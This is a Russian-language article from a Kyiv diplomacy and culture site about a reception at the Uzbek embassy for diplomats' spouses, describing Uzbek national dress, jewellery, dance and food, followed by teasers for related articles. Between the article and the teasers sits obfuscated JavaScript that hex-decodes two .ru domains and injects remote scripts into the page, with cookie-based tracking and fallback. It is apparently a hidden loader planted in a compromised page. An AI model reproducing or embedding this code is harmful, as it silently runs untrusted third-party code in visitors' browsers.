RU  UK  EN
Статьи  >  Узнай  >  Посольство Узбекистана в Киеве приветливо встретило участниц Ambassador’s Spouses Club Kiev

Посольство Узбекистана в Киеве приветливо встретило участниц Ambassador’s Spouses Club Kiev

Ambassador’s Spouses Club Kiev, объединяет жен дипломатов, глав дипломатических миссий разных стран в Украине и ведет активную светскую, культурную и благотворительную жизнь. Также, в рамках работы организации каждая из участниц старается познакомить коллег с достояниями своей родной страны.

Именно с этой целью собрала участниц Гульноза Абдуалиева - жена Чрезвычайного и Полномочного Посла Узбекистана в Украине Алишера Абдуалиева. Торжественная встреча была приурочена специально ко Дню независимости Узбекистана. К этому значимому празднику, госпожа Гульноза, при поддержке Посольства Узбекистана решила привнести частичку неповторимого востока в украинскую столицу. И, через традиционные, к тому же небезразличные, каждой женщине особенности такие как: одежда, танцы и кухня, познакомить гостей со своей культурой.

Для всех пришедших хозяйка встречи подготовила познавательный фильм, который на несколько минут перенес на прогулку по удивительным парками Ташкента и тщательно оберегающему дух старины Самарканду…

Свой рассказ госпожа Гульноза начала с представления выставки нарядов, отображающей особенности разных регионов Узбекистана. Перед гостями открылся весь спектр восточной самобытности, отображенный через творческий подход и мастерство узбекского народа. Старинные костюмы в стиле «этно», (паранджа, халат-чапан), оформленные аутентичными элементами, показали неповторимое сочетание вековых традиций, исторических особенностей, и жизненного уклада…

Национальная одежда для узбеков имела важное значение еще с самых древних времен, а особое влияние на ее формирование оказал Великий Шелковый путь. Будучи торговым маршрутом он начинался на землях Китая, и проходил через ближний Восток вплоть до Средиземного моря, пересекая Согдийские и Бактрийские земли, на которых и находятся современный Узбекистан. Охватывая такую впечатляющую часть территорий он способствовал передаче не только товаров, но и технологий, и идей. Благодаря такому обмену в стране стало активно развиваться шелководство, хлопководство и как следствие искусство изготовления тканей, в котором здешние мастера, без преувеличения, достигли совершенства! Потому, не кривя душой, можно сказать что Вся яркость и буйство красок этого солнечного государства отобразилась на полотне ткацкого станка!

Узбекский костюм удивляет своим многообразием, по цвету и орнаменту можно четко определить принадлежность каждого к региону, где он был создан. На территориях Бухары и Самарканда – в нарядах чаще используют бархат синего или бордового цвета, обильно вышитый золотой нитью. В Сурхандарьи и Каракалпакии предпочтение отдаётся шелку или хлопковой ткани, украшенным сплетенными крючком фрагментами. Для Ташкента и Коканда характерны полосатые халаты, имеющие элементы европейской одежды, а Хорезмский костюм, отличается обилием звенящих подвесок.

В свою очередь, детали из которых состоит национальная одежда женщин Узбекистана схожи для всех частей страны, это: халат, платье, тюбетейка или платок, шаровары и паранджа – уберегающая даму от посторонних взглядов. Последнее даже являлась своеобразным паспортом для ее обладательницы

К примеру, паранджа задекорированная большим количеством вышитых элементов говорила о материальном достатке ее хозяйки. Узоры отображали к какому роду принадлежит девушка. По соединенным рукавам легко можно было определить замужнюю женщину, а бомбоны, пришитые к ним, свидетельствовали о количестве детей. Возраст владелицы зачастую, определял цвет костюма. Так, молодые девушки предпочтительно надевали более яркие оттенки, а дамы в возрасте - тёмные тона. Лицо женщины покрывалось чачваном – это своего рода покрывало, что ткалось, обычно, из конского волоса, и способствовало хорошей вентиляции. Сейчас же паранджа ушла из повседневного обихода и используется только в ритуальных целях, на свадьбах и похоронных процессиях.

С неподдельным интересом участницы клуба также разглядывали украшения, демонстрирующиеся на выставке отдельной экспозицией. Возраст некоторых из аксессуаров составляет порядка ста лет. Важно, что помимо своих эстетических качеств колье, бусы или серьги также имели функции оберега, зачастую они были очень массивными, располагались в районе солнечного сплетения, и должны были защищать хозяйку от сглаза.

Но, сейчас, в условиях современной жизни национальная одежда все чаще используется в основном на театральных подмостках в сценических выступлениях. И, что бы продемонстрировать гостям мероприятия, как наряды выглядят на представительницах прекрасного пола, организаторы встречи приготовили для всех подарок в виде выступления хореографического ансамбля «Сабо», дополнившего царившую неповторимую атмосферу Востока посредством танцевальных номеров.

Узбекский танец -  является своеобразным монологом женщины. Восточная женщина не может рассказать о своих чувствах на словах и делает это посредством танцевальных па. Здесь, как и в Японском, Китайском или Индийском надо иметь выразительные глаза и руки, которые характеризуются плавностью и чувственностью движений. 

И что бы закрепить знакомство участников встречи с культурными особенностями Узбекистана, организаторы мероприятия, с характерным узбекам гостеприимством, угощали всех традиционными блюдами, среди которых были плов, чучвара, самса и восточные сладости. Глубокая история кухни тесно связана с прошлым и традициями страны. Значительное воздействие на ее разнообразие и специфику оказало то, что в отличие от географических соседей узбеки вели как оседлый образ жизни, так и кочевой. В то же время заимствование кулинарных традиций, смешивание культур оказало значимое влияние на разнообразие и богатство блюд. Происхождение многих из них имеет общие корни с азиатскими кушаньями, такими как, например, манты или плов. Привкус специй и аромат лакомств легким флером дополнили восточную атмосферу праздника. Госпожа Гульноза  с удовольствием делились со всеми желающими рецептурными тонкостями, что бы каждый мог затем воссоздать кулинарные шедевры Узбекистана не только в памяти и и на своей кухне.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="16101",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("theoutlook.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Вам это будет интересно:
В Киеве при поддержке Посольства Германии состоялся концерт "Посвящение" певца Виктора Рудя
В Национальной филармонии Украины при поддержке посольства Германии прошел концерт оперного и камерного певца Виктора Рудя. Мероприятие состоялось в рамках «Недели Германии в Украине», продолжающихся с 10 по 26 ноября в 14 городах нашей страны.
Посольства Литвы и Австралии представили в Киеве выставку фотографий «Олегас Труханас - легенда Литвы и Австралии»
Посольство Литовской Республики в Украине, Посольство Австралии в Украине и Национальный музей Тараса Шевченко представили в Киеве выставку фотографий «Олегас Труханас - легенда Литвы и Австралии».
Посольство Казахстана презентовало проект о жизни Тараса Шевченко в Казахстане
Посольством Республики Казахстан в Украине и Почетным консульством Казахстана в Западной Украине был реализован проект «Кобзарь в степях Казахстана», который повествует о жизни и творчестве Тараса Шевченко в период его ссылки в Казахстане.
В Посольстве Узбекистана прошла презентация для украинских представителей обувной промышленности
Посольством Узбекистана в Украине при поддержке ассоциации «Узчармпойабзали» и ассоциации «Укркожобувьпром», а также Торгово-промышленной палаты Украины, «Укрлегпром» и Союза украинских предпринимателей проведена Узбекско-украинская деловая встреча, в работе которого приняли участие более 60 представителей из более 23 предприятий кожевенной и обувной промышленности двух стран, а также представители Торговых сетей Украины.
Многогранная палитра мира в Киеве. OUTLOOK WORLD CULTURE FESTIVAL в четвертый раз собрал гостей и друзей. Часть 2
Пересматривая тысячи фотографий, запечатлевшие яркие эмоции наших гостей, мы вновь и вновь возвращаемся в тот день, наполненный яркими красками, радостными встречами и задорным смехом. Сегодня вместе с вами хотим еще раз вспомнить фестиваль OUTLOOK WORLD CULTURE FESTIVAL 2017.
Посольство Узбекистана представило в Украине продукцию автомобилестроительной отрасли
Чрезвычайный и Полномочный Посол Республики Узбекистан Алишер Абдуалиев представил линейку автомобилей, созданную предприятиями структуры Узавтопром. Двор Посольства превратился в демонстрационную площадку возможностей автомобилей RAVON моделей R-2, R-4 и Ravon-Gentra.
В посольстве Германии отметили День единства
Чрезвычайный и Полномочный Посол Федеративной Республики Германия в Украине Эрнст Райхель с женой приняли гостей в честь праздника - официального объединения Западной и Восточной Германии. Также господин Райхель отметил осуществленный Украиной скачок в направлении Европы - заключение соглашения об ассоциации с Европейским Союзом: «Соглашение обеспечит поддержку и консультирование, политическое согласование и приближение Украины к стандартам Европейского Союза во многих отраслях».
В Посольстве Венгрии анонсировали творческую осень
В Киеве состоялась пресс-конференция при поддержке посольства Венгрии в Украине, посвященная феерии венгерского творчества осенью 2017 года. Открыл встречу приветственным словом Посол Венгрии в Украине Эрно Кешкень оглашением программы культурных мероприятий, запланированных в Киеве при поддержке и содействии венгерских дипломатов и подчеркнул важность совместных проектов наших стран.
В Киеве состоялась пресс-конференция по случаю участия иностранных дипломатов в Международном инвестиционном форуме «InCo-2017»
Пресс-конференция по случаю проведения Международного инвестиционного форума «InCo-2017» состоялась 26 сентября в медиа-центре ГДИП. На мероприятии выступили: генеральный директор КП «ГДИП» Павел Кривонос, начальник Управления внешних сношений и внешнеэкономической деятельности Запорожской ОГА Артур Бойко, Чрезвычайный и Полномочный Посол Республики Болгария в Украине Красимир Минчев, вице-президент Запорожской торгово-промышленной палаты Дмитрий Антонюк и руководитель проекта OUTLOOK Дария Карякина.
Посольство Индонезии в Украине облачило монумент королевы Анны в Киеве в традиционное свадебное платье балийской женщины
Посольство Республики Индонезия в Украине под эгидой Киевской городской администрации инициировало новую традицию переодевания памятника королевы Анны на Львовской площади в национальные наряды разных стран. Первым платьем в гардеробе стало традиционное свадебное платье балийской женщины.
Посольство Казахстана в Украине провело "круглый стол", посвященный 25-летию дипломатических отношений
Чрезвычайный и Полномочный Посол республики Казахстан в Украине Самат Ордабаев 27 сентября провел в Киеве "круглый стол", посвященный 25-летию дипломатических отношений между нашими странами. В мероприятии приняли участие главы дипломатических миссий, народные депутаты Верховной Рады, руководители государственных органов Украины, представители творческой и научной отраслей, бизнес-сообщества, СМИ
В Киеве пройдет четвертый фестиваль культур народов мира OUTLOOK WORLD CULTURE FESTIVAL
7 октября с 12:00 до 16:00 в Колонном зале Киевского городского совета (ул. Крещатик, 36) состоится четвертый фестиваль культур народов мира OUTLOOK WORLD CULTURE FESTIVAL, который представит в разных проявлениях культуру более 40 стран мира с участием 30 посольств иностранных государств и диаспор. Фестиваль ежегодно организовывает проект OUTLOOK, работающий в сфере медиа и культурной дипломатии.
Посол Руслан Болбочан открыл Почетное консульство Молдовы во Львове
Чрезвычайный и Полномочный посол Молдовы в Украине Руслан Болбочан открыл Почетное консульство Молдовы во Львове. Торжественно перерезали ленту заместитель городского главы Львова, представители власти области, Почетный консул Республики Молдова и представитель МИД Украины во Львове.
Посол Узбекистана Алишер Абдуалиев провел прием в честь Дня Независимости и 25-летия дипломатических отношений
Чрезвычайный и Полномочный Посол Узбекистана в Украине Алишер Абдуалиев провел торжественный прием в честь 26-ой годовщины Независимости своей страны и 25-летия установления дипломатических отношений между Узбекистаном и Украиной.
Знай наших: Христя Фриланд
В сегодняшнем продолжении нашей рубрики о знаменитых украинцах, меняющих мир здесь и сейчас, мы рассказываем о невероятно энергичной Христе Фриланд – журналисте, писателе, а теперь уже и успешном политике. Этническая украинка, прекрасно владеющая «рідною мовою»,– замечательный пример того, что человек, если он этого сам хочет, может развиваться во многих сферах.
В Киеве состоялась четвёртая встреча выпускников Института международных отношений
16 сентября в парке Института международных отношений Киевского национального университета имени Тараса Шевченко прошло грандиозное событие, объединившее выпускников и преподавателей тёплыми воспоминаниями – четвертая встреча выпускников ИМО.
Посол Мексики провела торжественный прием в честь Дня Независимости
Чрезвычайный и Полномочный Посол Мексики в Украине Мария Луиза Беатрис Лопес Гаргальо провела торжественный прием в честь национального праздника - Дня Независимости, отмечаемого в стране пышно и с большим размахом.
Президент Украины принял верительные грамоты у послов Дании, Афганистана и Грузии
Президент Украины Петр Порошенко принял верительные грамоты у послов Королевства Дания Рубена Мэдсена, Исламской Республики Афганистан Сардара Мохаммада Рахман Оглы и Грузии Гелы Думбадзе.
В Киеве прошел фестиваль-открытие украинско-немецкого года языков
В Киеве на Контрактовой площади в минувшие выходные прошел уличный фестиваль, посвященный открытию украинско-немецкого года языков. Событие, которое открылось велопробегом и сопровождалось интерактивными уроками немецкого языка и трансляциями из разных городов Украины, прошло под эгидой Посольства Германии в Украине и Goethe-Institut.
ВИДЕО: Величественное наследие Узбекистана
Благодаря Посольству Узбекистана в Украине и лично Чрезвычайному и Полномочному Послу Алишеру Абдуалиеву OUTLOOK посчастливилось побывать в этой гостеприимной стране. И сегодня мы расскажем об уникальном месте - Мавзолее выдающегося полководца и политического деятеля Амир Темура.
Закрыть
Outlook facebook page